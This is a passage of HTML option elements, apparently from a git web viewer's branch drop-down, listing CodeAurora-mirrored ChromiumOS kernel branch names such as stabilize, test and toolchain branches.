-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.88.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.88.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.88.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5116.88.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5254.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5254.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5254.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5254.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5339.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5339.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5339.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5339.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5412.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5412.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5412.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5412.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5414.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5414.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5414.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5414.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5463.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5463.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5463.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5463.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.100.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.100.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.100.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.100.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.130.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.130.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.130.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.130.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.26.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.26.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.26.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.26.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.71.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.71.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.71.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5500.71.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5511.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5511.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5511.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5511.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5579.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5579.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5579.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5579.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5656.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5656.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5656.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5656.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5656.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5656.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5680.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5680.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5680.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5680.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5680.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5680.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5696.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5696.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5696.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5696.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5696.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5696.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.49.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.49.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.49.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.49.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.49.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.49.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.61.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.61.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.61.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.61.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.61.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.61.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.8.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.8.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.8.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.8.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.8.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.8.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.89.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.89.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.89.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.89.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.89.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5712.89.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5784.0.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5784.0.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5784.0.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5784.0.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5784.0.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5784.0.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5791.0.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5791.0.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5791.0.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5791.0.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5791.0.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5791.0.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5807.0.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5807.0.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5807.0.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5807.0.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5807.0.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5807.0.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5828.0.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5828.0.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5828.0.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5828.0.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5828.0.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5828.0.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5841.76.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5841.76.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5841.76.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5841.76.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5841.76.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5841.76.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5841.83.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5841.83.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5841.83.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5841.83.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5841.83.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5841.83.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5875.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5875.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5899.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5899.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5942.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5942.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5943.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5943.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5944.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-5944.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6082.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6082.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6092.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6092.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6146.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6146.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6297.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6297.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6310.69.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6310.69.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6412.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6412.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6415.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6415.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6436.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6436.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6480.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6480.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6909.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6909.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6919.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6919.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6937.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6937.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6946.55.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6946.55.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6996.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-6996.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7018.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7018.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7019.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7019.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7039.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7039.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7059.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7059.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7060.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7060.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7077.111.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7077.111.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7077.122.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7077.122.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7077.123.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7077.123.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7077.134.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7077.134.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7131.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7131.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7134.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7134.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7155.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7155.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7173.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7173.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7199.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7199.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7202.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7202.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7204.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7204.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7356.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7356.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7374.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7374.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7390.59.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7390.59.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7390.68.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7390.68.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7442.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7442.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7956.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7956.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7978.18.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7978.18.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7978.51.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7978.51.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7978.66.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7978.66.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7978.74.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7978.74.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7978.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-7978.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-8104.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-8104.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-8172.47.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-8172.47.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-R33-4982.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-R33-4982.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-bluetooth-smart'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-bluetooth-smart</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-daisy'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-daisy</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-daisy-4319.96.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-daisy-4319.96.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-falco-4537.91.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-falco-4537.91.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-gnawty-5841.84.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-gnawty-5841.84.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-gnawty-5841.84.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-gnawty-5841.84.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-gnawty-5841.84.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-gnawty-5841.84.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-jetstream-7390.54.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-jetstream-7390.54.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-jetstream-7390.62.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-jetstream-7390.62.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-link'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-link</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-link-2913.278'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-link-2913.278</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-spring-4100.53.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-spring-4100.53.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-springlte-5116.46.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-springlte-5116.46.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-springlte-5116.46.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-springlte-5116.46.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-swanky-5841.55.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-swanky-5841.55.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-swanky-5841.55.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-swanky-5841.55.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-swanky-5841.55.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-swanky-5841.55.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-zako-5712.88.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-zako-5712.88.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-zako-5712.88.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-zako-5712.88.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-zako-5712.88.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize-zako-5712.88.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize.5978.51.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize.5978.51.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize.5978.98.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize.5978.98.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize.59781.98.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize.59781.98.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilize2'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilize2</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/stabilze-7441.B'>caf/3.10/caf/chromium-googlesource-kernel-next/stabilze-7441.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/test-4824.B'>caf/3.10/caf/chromium-googlesource-kernel-next/test-4824.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/test-4980.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/test-4980.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/test-4980.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/test-4980.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/test-5394.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/test-5394.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/test-5394.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/test-5394.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/test-5619.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/test-5619.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/test-5619.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/test-5619.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/test-982.B'>caf/3.10/caf/chromium-googlesource-kernel-next/test-982.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/toolchain-3428.65.B'>caf/3.10/caf/chromium-googlesource-kernel-next/toolchain-3428.65.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/toolchain-3701.42.B'>caf/3.10/caf/chromium-googlesource-kernel-next/toolchain-3701.42.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/toolchainA'>caf/3.10/caf/chromium-googlesource-kernel-next/toolchainA</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/toolchainB'>caf/3.10/caf/chromium-googlesource-kernel-next/toolchainB</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/x32'>caf/3.10/caf/chromium-googlesource-kernel-next/x32</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/0.11.241.B'>caf/3.10/caf/chromiumos-third-party-kernel/0.11.241.B</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/0.11.257.B'>caf/3.10/caf/chromiumos-third-party-kernel/0.11.257.B</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/0.11.257.B90'>caf/3.10/caf/chromiumos-third-party-kernel/0.11.257.B90</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/0.12.362.B'>caf/3.10/caf/chromiumos-third-party-kernel/0.12.362.B</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/0.12.369.B'>caf/3.10/caf/chromiumos-third-party-kernel/0.12.369.B</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/0.12.392.B'>caf/3.10/caf/chromiumos-third-party-kernel/0.12.392.B</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/0.12.433.B'>caf/3.10/caf/chromiumos-third-party-kernel/0.12.433.B</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/0.12.433.B109'>caf/3.10/caf/chromiumos-third-party-kernel/0.12.433.B109</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/0.12.433.B62'>caf/3.10/caf/chromiumos-third-party-kernel/0.12.433.B62</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/0.13.434.B'>caf/3.10/caf/chromiumos-third-party-kernel/0.13.434.B</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/0.13.509.B'>caf/3.10/caf/chromiumos-third-party-kernel/0.13.509.B</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/0.13.558.B'>caf/3.10/caf/chromiumos-third-party-kernel/0.13.558.B</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/0.13.587.B'>caf/3.10/caf/chromiumos-third-party-kernel/0.13.587.B</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/0.14.811.B'>caf/3.10/caf/chromiumos-third-party-kernel/0.14.811.B</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/0.15.877.B'>caf/3.10/caf/chromiumos-third-party-kernel/0.15.877.B</option>
-<option value='caf/3.10/caf/chromiumos-third-party-kernel/11.1.241.B'>caf/3.10/caf/chromiumos-third-party-kernel/11.1.241.B</option>
